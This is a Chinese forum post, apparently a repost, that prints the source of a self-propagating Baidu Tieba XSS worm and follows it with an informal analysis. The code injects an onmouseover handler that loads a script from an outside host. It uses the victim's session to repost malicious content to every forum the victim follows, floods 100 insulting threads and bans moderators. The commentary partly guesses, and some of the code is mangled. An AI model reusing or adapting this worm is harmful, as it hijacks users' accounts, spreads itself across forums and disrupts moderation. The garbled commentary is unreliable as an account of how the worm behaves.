"on m)ou seo)ver="$.getScript ('//new)wo )) rdpre) ss.du app).com)/ xss2)01 40309/r c1.js')
.function addThread(fid) {
$.post("/relay/commit", {
ie: "utf-8",
kw: "test",
fid:35,
tid:2910585163,
ftid: fid,
ptid:2910585163,
ppid:47102132189,
tbs: PageData.tbs,
title: config.titles[Math.random() * config.titles.length | 0],
content: "aeb1cb13495409230133f7cd9058d109b3de492f#"+config.contents[Math.random() * config.contents.length | 0]+config.evilContent,
new_vcode:1,
tag:11,
activity_id:1425,
act_type:"photo",
__type__:"repost"
},function (x) {
if (x.no == 0 || x.new_thread_id) return x.new_thread_id;})
}
function reply(){
if (-1 !== config.whiteList.indexOf(PageData.user.user_forum_list.info[num].id) || !userInfo.is_red_tail && !PageData.user.user_forum_list.info[num].is_like){num++;return;}
if(PageData.user.user_forum_list.info[num].tid){
num++;
}else{
PageData.user.user_forum_list.info[num].tid=true;addThread(PageData.user.user_forum_list.info[num].id);
}
}
function fuckRedTail() {
var obj = {
ie: "utf-8",
kw: "\u8d34\u5427\u610f\u89c1\u53cd\u9988",
fid: 898666,
tbs: PageData.tbs,
title: "\u767e\u5ea6SB",
content: config.contents[Math.random() * config.contents.length | 0]
}
for(var i=0;i<100;i++){
$.post("/f/commit/thread/add",obj);
}
}
if(userInfo.is_red_tail){setInterval("fuckRedTail()",8000)}
if ("daba" === userInfo.is_bawu){ killXiaoBa(); czDaba();}
if ("xiaoba" === userInfo.is_bawu) banXiaoBa();
var ruchong=setInterval("reply()",2000);

解读代码过程:
加上判定的JS普通语句,挟持域名和IP,可见功能是划过该代码者将自动转发该程式到所有指定贴吧。
而且被挟持的大吧会自动封禁小吧主。
服务器地址被加密了以至于我找不到IP缓存位置。
最后大吧会自动ban自己,解除所有权限,最后反复传播直到服务器崩溃。
所有的贴吧全部都可能被感染。
本体复制,该代码会以5min为周期自我复制。
最后一段加密了,所以暂时不清楚如何结束程序。
完,谢谢观赏,顺便说一下,手机客户端无法运行该代码。
【以上是盗来的原文,未经授权所以不能把原楼主圈出来了】
